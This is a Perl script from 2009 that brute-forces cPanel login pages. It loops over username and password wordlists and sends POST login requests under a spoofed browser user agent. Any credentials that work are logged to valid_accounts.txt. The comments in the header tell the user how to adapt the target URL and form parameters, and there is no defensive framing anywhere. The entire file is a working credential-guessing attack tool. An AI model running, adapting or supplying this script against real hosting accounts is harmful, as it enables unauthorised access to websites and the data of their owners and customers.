#!/usr/bin/perl
# $Id: cpanel_bf.pl 6 2009-04-07 01:42:34Z tasos $
#
# Anastasios Monachos - anastasiosm@gmail.com
#
# Usage:   perl cpanel_bf.pl -u my_username_collection.txt -p my_passwords.txt -d delay_in_seconds
#
# Very simple script that attempts to brute-force the cPanel's login page of 
# your favorite hosting provider. Before you run the script you should find a 
# few things like: the url to be attacked, all the passing parameters in the 
# POST method, including the hidden ones. Once you have these information, jump
# to line 71 and apply the appropriate changes. Then using your username and 
# password file run the program, do not forget to set the delay parameter too. 
# Any successful authentication will be reported on the screen and will be saved
# in the file named valid_accounts.txt for your convenience.

use Getopt::Long;
use HTTP::Request::Common "POST";#export POST method
use HTTP::Cookies;
use LWP::UserAgent;

my $username_file;
my $password_file;
my $delay_value;
my $successful_logins = "valid_accounts.txt";
my $counter = 0;

Getopt::Long::GetOptions
(
	'u=s' => \$username_file,
	'p=s' => \$password_file,
	'd=i' => \$delay_value
) or die usage();

sub usage ()
{
	print STDERR << "EOF";
	********************************************************************************************
	-h		: this (help) menu
	-u		: <USERNAMES_FILE>
	-p		: <PASSWORDS_FILE>
	-d		: <DELAY> between login attempts in secs
	example		: perl $0 -u my_username_collection.txt -p my_passwords.txt -d 1
	********************************************************************************************
	
EOF
        exit;
}

open(USERNAMES_FILE, "<$username_file") || die ("Usernames file is missing.");
open(PASSWORDS_FILE, "<$password_file") || die ("Password file is missing.");
@array_of_usernames= <USERNAMES_FILE>;#Load contents in memory
@array_of_passwords= <PASSWORDS_FILE>;
close(USERNAMES_FILE);
close(PASSWORDS_FILE);

foreach $username (@array_of_usernames)
{
	chomp($username);
	foreach $password (@array_of_passwords)
	{
		chomp($password);
		sleep($delay_value);
		$browser = LWP::UserAgent -> new;
		$browser->agent('Mozilla/8.0');#masquerade as FF
		my $cookie_jar = HTTP::Cookies->new(file => 'collected_cookies.txt');#collect all cookies if any
		$browser->cookie_jar($cookie_jar);
		printf("\nTrying $username:$password", ++$counter);

#Check source code at the attacked website and get: the names of the fields for the username and password including all hidden parameters
my $request_http = POST 'http://box.domain.com:portnumber/login/', [ login_theme => '', user=> $username, pass=> $password, goto_uri=> '/'];

#example:	POST http://box123.hostme.com:2802/login/ and these are the parameters login_theme=&user=test&pass=test&goto_uri=/

		my $request_http = $browser->request($request_http);#send request
		if ($request_http->as_string =~ /$username/gi)#when successfully logged in at least the username will be presented
		{
			open (LOG, ">>$successful_logins");
			print LOG "Username: $username\tPassword: $password\n";#In case the script cannot save the results
			print "\t---> Got one: Username: $username\tPassword: $password\n";
			close(LOG);
		}
	}
}
  
if (-e "$successful_logins")
{
	print "\nA file called valid_accounts.txt has been created... Check it out :)\n\n";
}
else
{
	print "\nSorry, I have nothing to report you, try again with another username/password list :(\n\n";
}